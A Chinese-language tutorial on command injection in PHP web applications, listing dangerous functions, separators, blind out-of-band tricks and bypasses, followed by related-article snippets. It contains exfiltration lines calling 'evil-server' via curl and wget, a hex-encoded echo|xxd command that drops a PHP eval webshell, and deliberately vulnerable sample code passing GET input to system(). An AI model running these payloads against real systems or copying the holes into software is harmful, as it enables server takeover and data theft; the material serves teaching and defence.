<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    常見漏洞之命令注入

    VSole2021-12-17 14:21:26

    命令注入通常因為指Web應用在服務器上拼接系統命令而造成的漏洞。該類漏洞通常出現在調用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機名/IP/掩碼/網關、查看系統信息以及關閉重啟等功能,或者一些站點提供如ping、nslookup、提供發送郵件、轉換圖片等功能都可能出現該類漏洞。

    漏洞介紹

    程序員使用腳本語言(比如PHP)開發應用程序過程中,腳本語言開發十分快速、簡潔,方便,但是也伴隨著一些問題。比如說速度慢,或者無法接觸系統底層,如果我們開發的應用,特別是企業級的一些應用需要去調用一些外部程序。當應用需要調用一些外部程序時就會用到一些執行系統命令的函數。

    漏洞成因

    用戶可控點可以使用管道符進行命令拼接

    參數點的過濾不嚴格,或者可以被繞過

    漏洞危害

    繼承Web服務器程序的權限,去執行系統命令

    繼承Web服務器程序的權限,讀寫文件

    反彈shell

    寫Webshell

    控制整個網站

    甚至控制整個服務器

    相關函數

    system() 有回顯, 輸出并返回最后一行shell結果。

    passthru()(有回顯),只調用命令,把命令的運行結果原樣地直接輸出到標準輸出設備上。

    exec() (回顯最后一行-必須echo輸出)不輸出結果,返回最后一行shell結果,所有結果可以保存到一個返回的數組里面。

    shell_exec() (無回顯-必須輸出)

    反引號:``

    popen(handle,mode)(無回顯,返回指針,需要將結果存到文件中)不會直接返回執行結果,而是返回一個文件指針

    proc_open(‘cmd’,‘flag’,‘flag’)(無回顯)不會直接返回執行結果,而是返回一個文件指針。

    常見注入方式

    • 分號分割
    • || && & 分割
    • | 管道符
    • \r %d0%a0 換行
    • 反引號解析
    • $() 替換

    無回顯技

    • bash反彈shell
    • DNS帶外數據
    • http帶外
    curl http://evil-server/$(whoami)
    wget http://evil-server/$(whoami)
    
    • 無帶外時利用 sleep 或其他邏輯構造布爾條件

    命令注入繞過

    Windows:

    WINDOWS:用^轉義<,即執行echo^>web可寫目錄加文件完整名字

    LINUX:需要用\來轉義<,不過很多PHP都默認開啟gpc(魔術引號magic_qutes_gpc())。可以先用16進制轉換一句話再用xxd命令把16進制還原。

    echo 3c3f706870206576616c28245f504f53545b6b616e675d293b203f3e|xxd -r -ps > web可寫目錄加文件完整名字

    管道符說明:

    |:管道符,將一個程序的輸出作為另一個程序的輸入

    >:輸出重定向,將程序的輸出流入到某個程序或者文本中

    >>:追加輸出重定向,將輸出的內容追加到一個文件的末尾

    <:輸入重定向,將輸入的內容重定向到文件或程序中

    其他特殊符號:

    Windows平臺:

    | 直接執行后面的語句 ping 127.0.0.1|whoami

    || 前面出錯執行后面的 ,前面為假 ping 2 || whoami

    & 前面的語句為假則直接執行后面的,前面可真可假 ping 127.0.0.1&whoami

    && 前面的語句為假則直接出錯,后面的也不執行,前面只能為真 ping 127.0.0.1&&whoami

    命令注入漏洞及利用

    實例代碼:

    $arg = $_GET['cmd'];if($arg){    system("$arg");}?>
    

    實例代碼:

    $ip = $_GET['ip'];if($ip){    system("ping –c 3 $ip");}?>
    

    漏洞危害

    繼承Web服務器程序的權限,去執行系統命令

    繼承Web服務器程序的權限,讀寫文件

    反彈shell

    寫Webshell

    控制整個網站

    甚至控制整個服務器

    漏洞ping
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    微軟將在10月的補丁周二發布中再次發布大量安全修補程序,其中11個被微軟評為”關鍵”。這些漏洞堪比2013 年 Windows 中修復的”死亡ping漏洞。通過精心制作的數據包使拒絕服務和潛在的遠程代碼執行成為可能。開發一個”藍屏死亡”的DoS攻擊是可以的。即使有可能可以可靠地預測stack canary落在系統外殼在用戶模式下還需要正確確定Windows內核的基本地址。針對此漏洞的防護 此處提供一個Lua腳本用于此漏洞的檢測可以集成到IDS中。
    file=2663◆測試環境:Ubuntu 18.04根據漏洞描述可得到幾個關鍵詞:遠程命令執行、/lan.jsp頁面、Device Name 參數、HTTP、POST、get set cpp。這里應該是一個POST請求提交數據。在文件系統中查找關鍵詞并沒有發現名為“get_set.ccp”的文件,沒有“get_set.ccp”文件,這個URL應該是交給后端處理,處理好之后將結果返回給用戶。在復現這個漏洞中發現2022年剛披露的信息和2023年有所不同,2022年的描述更具體,2023的變得模糊一些。剛開始以為是為了保護廠商,避免提示太明顯容易被利用。
    內網滲透掃描器
    2023-06-16 09:08:32
    一、工具介紹 LadonGo一款開源內網滲透掃描器框架,使用它可輕松一鍵探測C段、B段、A段存活主機、指紋識別、端口掃描、密碼爆破、遠程執行、高危漏洞檢測等。
    常見漏洞之命令注入
    2021-12-17 14:21:26
    命令注入通常因為指Web應用在服務器上拼接系統命令而造成的漏洞。該類漏洞通常出現在調用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機名/IP/掩碼/網關、查看系統信息以及關閉重啟等功能,或者一些站點提供如ping、nslookup、提供發送郵件、轉換圖片等功能都可能出現該類漏洞
    CVE-2021-20873-MovableType XMLRPC 遠程命令執行漏洞分析。
    在一些開啟了 Hyper-V 的電腦上,RouterOS 可能無法在 VMWare Workstation 中模擬運行或啟動非常緩慢,如果遇到無法運行的情況,請酌情考慮關閉 Hyper-V,如果能成功運行但是啟動緩慢,可以及時拍攝快照。
    Perun介紹Perun是一款主要適用于乙方安服、滲透測試人員和甲方RedTeam紅隊人員的網絡資產漏洞掃描器/掃描框架,它主要適用于內網環境,加載漏洞檢測Vuln模塊后能夠快速發現安全問題,并根據需要生成報表,以方便安全人員對授權項目完成測試工作。Perun由Python2.7和Python標準庫開發,所有功能兼容Windows系統和*nix系統,Html報告采用Vue+Element,支持對掃描結果的排序、搜索、分頁。
    關于遠程代碼執行的常用Payload大家好,我是 Ansar Uddin,我是來自孟加拉國的網絡安全研究員。這是我的第二篇 Bug 賞金文章。今天的話題都是關于 Rce 的利用。攻擊者的能力取決于服務器端解釋器的限制。在某些情況下,攻擊者可能能夠從代碼注入升級為命令注入。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类